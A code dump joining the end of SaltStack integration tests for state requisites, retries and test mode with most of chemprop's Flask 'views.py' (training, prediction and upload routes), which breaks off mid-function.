absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
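    # A minimal sketch (assumed for illustration, not the actual retry.retry_custom fixture)
    # of a state using custom retry values; the attempts/interval numbers are illustrative:
    #
    #   file_test:
    #     file.exists:
    #       - name: /path/to/a/non-existent/file.txt
    #       - retry:
    #           attempts: 4
    #           interval: 15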
def test_retry_option_success(self):
'''
        test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
        test a state with the retry option that should return True after at least 4 retry attempts
        but without reaching 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
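    # Conceptually (illustrative only, not the exact implementation), the parallel state
    # cache filename is derived from a hash of the chunk's tag instead of the tag itself,
    # which keeps the filename short regardless of how long the ID dec or name is:
    #
    #   import hashlib
    #   cache_filename = hashlib.sha1(tag.encode('utf-8')).hexdigest()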
def _add_runtime_pillar(self, pillar):
'''
        helper method to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
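    # A minimal sketch (assumed for illustration, not the actual issue-30161 fixture) of a
    # state combining onlyif and unless; the path and shell commands are illustrative:
    #
    #   unless_false_onlyif_true:
    #     file.managed:
    #       - name: /tmp/test.txt
    #       - onlyif: 'true'
    #       - unless: 'false'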
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
views.py
|
"""Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from chemprop.web.app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.constants import MODEL_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_header, get_smiles, get_task_names, validate_data
from chemprop.train import make_predictions, run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
    # Note: crashes during model training are not handled here yet
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
    return f'{thing_being_named} "{original_name}" already exists. ' \
f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
if new_name is not None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
use_progress_bar = request.form.get('useProgressBar', 'True') == 'True'
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size),
])
# Get task names
args.task_names = get_task_names(path=data_path, smiles_columns=args.smiles_columns)
# Check if regression/classification selection matches data
data = get_data(path=data_path, smiles_columns=args.smiles_columns)
    # For now, the number of molecules is inferred from the length of smiles_columns; an option should be added to the site later
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
if use_progress_bar:
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, data, logger)[args.metrics[0]]
if use_progress_bar:
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
smiles = [[s] for s in smiles]
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
train_args = load_args(model_paths[0])
# Build arguments
arguments = [
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME']),
'--checkpoint_paths', *model_paths
]
if gpu is not None:
if gpu == 'None':
arguments.append('--no_cuda')
else:
arguments += ['--gpu', gpu]
# Handle additional features
if train_args.features_path is not None:
# TODO: make it possible to specify the features generator if trained using features_path
arguments += [
'--features_generator', 'rdkit_2d_normalized',
'--no_features_scaling'
]
elif train_args.features_generator is not None:
arguments += ['--features_generator', *train_args.features_generator]
if not train_args.features_scaling:
arguments.append('--no_features_scaling')
# Parse arguments
args = PredictArgs().parse_args(arguments)
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
# Replace invalid smiles with message
invalid_smiles_warning = 'Invalid SMILES String'
preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
return render_predict(predicted=True,
smiles=smiles,
num_smiles=min(10, len(smiles)),
show_more=max(0, len(smiles)-10),
task_names=task_names,
num_tasks=len(task_names),
preds=preds,
warnings=["List contains invalid SMILES strings"] if None in preds else None,
errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
:param return_page: The name of the page to render to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, MODEL_FILE_NAME)
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
:param checkpoint: The name of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one=True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
